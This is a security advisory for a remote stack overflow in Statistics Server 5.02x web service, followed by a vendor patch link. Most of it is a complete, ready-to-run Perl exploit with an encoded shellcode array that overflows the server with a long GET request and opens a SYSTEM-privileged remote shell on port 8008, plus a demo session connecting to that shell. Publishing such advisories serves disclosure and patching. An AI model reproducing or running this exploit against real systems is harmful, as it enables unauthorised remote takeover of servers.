COMMAND

    Statistics Server

SYSTEMS AFFECTED

    Statistics Server 5.02x

PROBLEM

    '|Zan' and Nemo found following.   'Statistics Server is far  more
    than just another log analyzer.   It analyzes Web site traffic  in
    "Real-time" and generates "Live Stats"  reports in an easy to  use
    Web interface.'

    'The ability of Statistics  Server to deliver Live  Web statistics
    for high volume installations  has made it an  essential component
    of many  corporate Internet  and Intranet  Web sites  and ISP  Web
    hosting installations.'

    Statistics Server  5.02x ships  with a  stack overflow  in its web
    component.  It  *lets run arbitrary  code inside* by  local/remote
    user.  Tests, ideas  & exploits were tested  against Win2k/Spanish
    version and WinNT 4.0/sp6a Spanish version.  Web server runs  like
    a system service with a default installation.

    Web server can't handle long requests correctly.  When a long  GET
    (about 2033 bytes) request is made. It dies with EIP  overwritten.
    It lets  run arbitrary  code with  web servers  privileges (system
    privileges by default).

    Exploit?  It spawns  a remote winshell on  8008 port.  It  doesn't
    kill  webserver  so  webserver  continues  running  while  hack is
    made.  When hack is finished webserver will run perfectly too.

        $ lynx http://vulnerable.com

            Server Selection
            Please Enter Server ID _____________ GO

            ....

        $ ./ssexploit502x.pl vulnerable.com 80


        (c) Deep Zone - Statistics Server 5.02x's exploit

        Coded by |Zan - izan@deepzone.org

        -=[ http://www.deepzone.org - http://deepzone.cjb.net ]=-

        spawning remote shell on port 8008 ...

        HTTP/1.0 302
        Server: Statistics Server 5.0
        Location: /_XXXXXXXXX_http://XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

        ...    ...     ...     ...     ...     ...     ...

        Content-Type: text/html
        Connection: Keep-Alive
        Content-Lenght: 0

        ... done.

        $ lynx http://vulnerable.com            (It continues working }:)

            Server Selection
            Please Enter Server ID _____________ GO

            ....

        $ telnet vulnerable.com 8008

        Trying vulnerable.com...
        Connected to vulnerable.com.
        Escape character is '^]'.

        Microsoft Windows 2000 [Version 5.00.2195]
        (C) Copyright 1985-1999 Microsoft Corp.

        D:\StatisticsServer>

    Exploit works against  Win2k/Statistics Server 5.02x  running like
    service.

    #!/usr/bin/perl -w
    # Statistics Server 5.02x's exploit.
    # usage: ./ssexploit502x.pl hostname port
    # 00/08/10
    # http://www.deepzone.org
    # http://deepzone.cjb.net
    # http://mareasvivas.cjb.net  (|Zan homepage)
    #
    # --|Zan <izan@deepzone.org>
    #
    --------------------------------------------------------
    #
    # This exploit works against Statistics Server 5.02x/Win2k.
    #
    # Tested with Win2k (spanish version).
    #
    # It spawns a remote winshell on 8008 port. It doesn't kill
    # webserver so webserver continues running while hack is made.
    # When hack is finished webserver will run perfectly too.
    #
    # Default installation gives us a remote shell with system
    # privileges.
    #
    # overflow discovered by
    # -- Nemo <nemo@deepzone.org>
    #
    # exploit coded by
    # -- |Zan <izan@deepzone.org>
    #
    #
    --------------------------------------------------------

    use IO::Socket;


    @crash = (
    "\x68","\x8b","\x41","\x1d","\x01","\x68","\x41","\x41","\x41",
    "\x41","\x68","\x61","\x41","\x41","\x41","\x58","\x59","\x5f",
    "\x2b","\xc1","\xaa","\x33","\xc9","\x66","\xb9","\x71","\x04",
    "\x90","\x90","\x90","\x68","\xbd","\x3e","\x1d","\x01","\x5e",
    "\x56","\x5f","\x33","\xd2","\x80","\xc2","\x99","\xac","\x32",
    "\xc2","\xaa","\xe2","\xfa","\x71","\x99","\x99","\x99","\x99",
    "\xc4","\x18","\x74","\xaf","\x89","\xd9","\x99","\x14","\x2c",
    "\xd4","\x8a","\xd9","\x99","\x14","\x24","\xcc","\x8a","\xd9",
    "\x99","\xf3","\x9e","\x09","\x09","\x09","\x09","\xc0","\x71",
    "\x4b","\x9b","\x99","\x99","\x14","\x2c","\x1c","\x8a","\xd9",
    "\x99","\x14","\x24","\x17","\x8a","\xd9","\x99","\xf3","\x93",
    "\x09","\x09","\x09","\x09","\xc0","\x71","\x23","\x9b","\x99",
    "\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d","\xd9","\x99",
    "\xcf","\x14","\x2c","\x87","\x8d","\xd9","\x99","\xcf","\x14",
    "\x2c","\xbb","\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x17",
    "\x8a","\xd9","\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d",
    "\xd9","\x99","\xcf","\x14","\x2c","\xbf","\x8d","\xd9","\x99",
    "\xcf","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\xcf","\x66",
    "\x0c","\x17","\x8a","\xd9","\x99","\x5e","\x1c","\xb7","\x8d",
    "\xd9","\x99","\xdd","\x99","\x99","\x99","\x14","\x2c","\xb7",
    "\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x0b","\x8a","\xd9",
    "\x99","\x14","\x2c","\xff","\x8d","\xd9","\x99","\x34","\xc9",
    "\x66","\x0c","\x37","\x8a","\xd9","\x99","\x14","\x2c","\xf3",
    "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x37","\x8a",
    "\xd9","\x99","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\x14",
    "\x24","\xff","\x8d","\xd9","\x99","\x3c","\x14","\x2c","\x87",
    "\x8d","\xd9","\x99","\x34","\x14","\x24","\xf3","\x8d","\xd9",
    "\x99","\x32","\x14","\x24","\xf7","\x8d","\xd9","\x99","\x32",
    "\x5e","\x1c","\xc7","\x8d","\xd9","\x99","\x99","\x99","\x99",
    "\x99","\x5e","\x1c","\xc3","\x8d","\xd9","\x99","\x98","\x98",
    "\x99","\x99","\x14","\x2c","\xeb","\x8d","\xd9","\x99","\xcf",
    "\x14","\x2c","\xb7","\x8d","\xd9","\x99","\xcf","\xf3","\x99",
    "\xf3","\x99","\xf3","\x89","\xf3","\x98","\xf3","\x99","\xf3",
    "\x99","\x14","\x2c","\x1b","\x8d","\xd9","\x99","\xcf","\xf3",
    "\x99","\x66","\x0c","\x0f","\x8a","\xd9","\x99","\xf1","\x99",
    "\xb9","\x99","\x99","\x09","\xf1","\x99","\x9b","\x99","\x99",
    "\x66","\x0c","\x07","\x8a","\xd9","\x99","\x10","\x1c","\x13",
    "\x8d","\xd9","\x99","\xaa","\x59","\xc9","\xd9","\xc9","\xd9",
    "\xc9","\x66","\x0c","\xcc","\x8a","\xd9","\x99","\xc9","\xc2",
    "\xf3","\x89","\x14","\x2c","\x9b","\x8d","\xd9","\x99","\xcf",
    "\xca","\x66","\x0c","\xc0","\x8a","\xd9","\x99","\xf3","\x9a",
    "\xca","\x66","\x0c","\xc4","\x8a","\xd9","\x99","\x14","\x2c",
    "\x17","\x8d","\xd9","\x99","\xcf","\x14","\x2c","\x9b","\x8d",
    "\xd9","\x99","\xcf","\xca","\x66","\x0c","\xf8","\x8a","\xd9",
    "\x99","\x14","\x24","\x0b","\x8d","\xd9","\x99","\x32","\xaa",
    "\x59","\xc9","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce",
    "\xc9","\xc9","\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99",
    "\x34","\xc9","\x66","\x0c","\x03","\x8a","\xd9","\x99","\xf3",
    "\xa9","\x66","\x0c","\x33","\x8a","\xd9","\x99","\x72","\xd4",
    "\x09","\x09","\x09","\xaa","\x59","\xc9","\x14","\x24","\x07",
    "\x8d","\xd9","\x99","\xce","\xc9","\xc9","\xc9","\x14","\x2c",
    "\xbb","\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03",
    "\x8a","\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a",
    "\xd9","\x99","\x1a","\x24","\x07","\x8d","\xd9","\x99","\x9b",
    "\x96","\x1b","\x8e","\x98","\x99","\x99","\x18","\x24","\x07",
    "\x8d","\xd9","\x99","\x98","\xb9","\x99","\x99","\xeb","\x97",
    "\x09","\x09","\x09","\x09","\x5e","\x1c","\x07","\x8d","\xd9",
    "\x99","\x99","\xb9","\x99","\x99","\xf3","\x99","\x12","\x1c",
    "\x07","\x8d","\xd9","\x99","\x14","\x24","\x07","\x8d","\xd9",
    "\x99","\xce","\xc9","\x12","\x1c","\x13","\x8d","\xd9","\x99",
    "\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99","\x34","\xc9",
    "\x66","\x0c","\x3b","\x8a","\xd9","\x99","\xf3","\xa9","\x66",
    "\x0c","\x33","\x8a","\xd9","\x99","\x12","\x1c","\x07","\x8d",
    "\xd9","\x99","\xf3","\x99","\xc9","\x14","\x2c","\x13","\x8d",
    "\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9",
    "\x99","\x34","\xc9","\x66","\x0c","\xfc","\x8a","\xd9","\x99",
    "\xf3","\x99","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce",
    "\xf3","\x99","\xf3","\x99","\xf3","\x99","\x14","\x2c","\xbb",
    "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03","\x8a",
    "\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
    "\x99","\xaa","\x50","\xa0","\x14","\x07","\x8d","\xd9","\x99",
    "\x96","\x1e","\xfe","\x66","\x66","\x66","\xf3","\x99","\xf1",
    "\x99","\xb9","\x99","\x99","\x09","\x14","\x2c","\x13","\x8d",
    "\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9",
    "\x99","\x34","\xc9","\x66","\x0c","\xf0","\x8a","\xd9","\x99",
    "\x10","\x1c","\x03","\x8d","\xd9","\x99","\xf3","\x99","\x14",
    "\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x14","\x2c",
    "\x13","\x8d","\xd9","\x99","\x34","\xc9","\x14","\x2c","\xbf",
    "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3f","\x8a",
    "\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
    "\x99","\xf3","\x99","\x12","\x1c","\x03","\x8d","\xd9","\x99",
    "\x14","\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x12",
    "\x1c","\x13","\x8d","\xd9","\x99","\xc9","\x14","\x2c","\xbb",
    "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3b","\x8a",
    "\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
    "\x99","\x70","\x90","\x67","\x66","\x66","\x14","\x2c","\x0b",
    "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\xf4","\x8a",
    "\xd9","\x99","\x14","\x2c","\x0f","\x8d","\xd9","\x99","\x34",
    "\xc9","\x66","\x0c","\xf4","\x8a","\xd9","\x99","\xf3","\x99",
    "\x66","\x0c","\x2b","\x8a","\xd9","\x99","\xc8","\xcf","\xf1",
    "\x6d","\x39","\xdc","\x99","\xc3","\x66","\x8b","\xc9","\xc2",
    "\xc0","\xce","\xc7","\xc8","\xcf","\xca","\xf1","\xe5","\x38",
    "\xdc","\x99","\xc3","\x66","\x8b","\xc9","\x35","\x1d","\x59",
    "\xec","\x62","\xc1","\x32","\xc0","\x7b","\x73","\x5a","\xce",
    "\xca","\xd6","\xda","\xd2","\xaa","\xab","\x99","\xea","\xf6",
    "\xfa","\xf2","\xfc","\xed","\x99","\xfb","\xf0","\xf7","\xfd",
    "\x99","\xf5","\xf0","\xea","\xed","\xfc","\xf7","\x99","\xf8",
    "\xfa","\xfa","\xfc","\xe9","\xed","\x99","\xea","\xfc","\xf7",
    "\xfd","\x99","\xeb","\xfc","\xfa","\xef","\x99","\xfa","\xf5",
    "\xf6","\xea","\xfc","\xea","\xf6","\xfa","\xf2","\xfc","\xed",
    "\x99","\xd2","\xdc","\xcb","\xd7","\xdc","\xd5","\xaa","\xab",
    "\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xf0",
    "\xe9","\xfc","\x99","\xde","\xfc","\xed","\xca","\xed","\xf8",
    "\xeb","\xed","\xec","\xe9","\xd0","\xf7","\xff","\xf6","\xd8",
    "\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xeb",
    "\xf6","\xfa","\xfc","\xea","\xea","\xd8","\x99","\xc9","\xfc",
    "\xfc","\xf2","\xd7","\xf8","\xf4","\xfc","\xfd","\xc9","\xf0",
    "\xe9","\xfc","\x99","\xde","\xf5","\xf6","\xfb","\xf8","\xf5",
    "\xd8","\xf5","\xf5","\xf6","\xfa","\x99","\xcb","\xfc","\xf8",
    "\xfd","\xdf","\xf0","\xf5","\xfc","\x99","\xce","\xeb","\xf0",
    "\xed","\xfc","\xdf","\xf0","\xf5","\xfc","\x99","\xca","\xf5",
    "\xfc","\xfc","\xe9","\x99","\xda","\xf5","\xf6","\xea","\xfc",
    "\xd1","\xf8","\xf7","\xfd","\xf5","\xfc","\x99","\xdc","\xe1",
    "\xf0","\xed","\xcd","\xf1","\xeb","\xfc","\xf8","\xfd","\x99",
    "\x9b","\x99","\x86","\xd1","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x95","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x98","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\xda","\xd4","\xdd","\xb7","\xdc","\xc1","\xdc",
    "\x99","\x99","\x99","\x99","\x99","\x89","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
    "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x90","\x90");


    #
    --------------------------------------------------------


    sub pcommands
    {
            die "usage: $0 hostname port\n" if (@ARGV != 2);
            ($host) = shift @ARGV;
            ($port) = shift @ARGV;
    }

    sub show_credits
    {
    print "\n\n\t (c) 2000 Deep Zone - Statistics Server 5.02x's";
    print "exploit\n\n\t\t  Coded by |Zan - izan\@deepzone.org\n";
    print "\n\t-=[ http://www.deepzone.org - http://deepzone.cjb";
    print ".net ]=-\n\n";
    }

    sub bofit
    {

            print "\nspawning remote shell on port 8008 ...\n\n";

            $s = IO::Socket::INET->new(PeerAddr=>$host,
                                       PeerPort=>$port,
                                       Proto=>"tcp");

            if(!$s) { die "error.\n"; }

            print $s "GET http://O";

            foreach $item (@crash) {
                    print $s $item
            }

            for ($cont=0; $cont<840;$cont++) {
                    print $s "\x90"
            }

            print $s "\x8c\x3e\x1d\x01";

            print $s "\r\n\r\n";

            while (<$s>) { print }

            print "... done.\n\n";

    }

    # ----- begin

    show_credits;
    pcommands;
    bofit;

    # ----- that's all :)

SOLUTION

    MediaHouse  has  created  a  5.03  patch  that  corrects  for  the
    Statistics  Server   (LiveStats)  5.02x   memory  overflow    bug.
    Additionally  5.03  addresses  a  problem  in  the  mail engine in
    regards  to  Windows  2000.    Log  file  management  and   server
    administration is more robust.  Download:

        http://www.mediahouse.com/statisticsserver/download_trial/dist/ss50.exe